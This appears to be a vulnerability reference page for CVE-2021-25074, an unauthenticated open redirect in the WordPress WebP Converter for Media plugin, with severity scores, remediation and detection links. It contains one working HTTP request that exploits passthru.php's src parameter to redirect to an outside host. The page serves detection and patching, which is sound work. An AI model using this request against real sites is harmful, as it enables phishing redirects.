🔙 목록으로 돌아가기

CVE-2021-25074: WordPress WebP Converter for Media < 4.0.3 - Unauthenticated Open Redirect

TitleWordPress WebP Converter for Media < 4.0.3 - Unauthenticated Open Redirect
AuthordhiyaneshDk
SeverityMedium
ImpactAn attacker can trick users into visiting a malicious website, leading to potential phishing attacks or the disclosure of sensitive information.
RemediationUpdate to the latest version of the WordPress WebP Converter for Media plugin (4.0.3) or remove the plugin if not needed.
CVSS Score6.1
EPSS Score0.01001
CVE IDCVE-2021-25074
CWE IDCWE-601
Tags cve2021 cve redirect wp-plugin webpconverter wpscan wordpress webp_converter_for_media_project vuln

🔍 Vulnerability Description

WordPress WebP Converter for Media < 4.0.3 contains a file (passthru.php) which does not validate the src parameter before redirecting the user to it, leading to an open redirect issue.

🌐 HTTP Request

GET /wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://interact.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-25074.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-25074.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A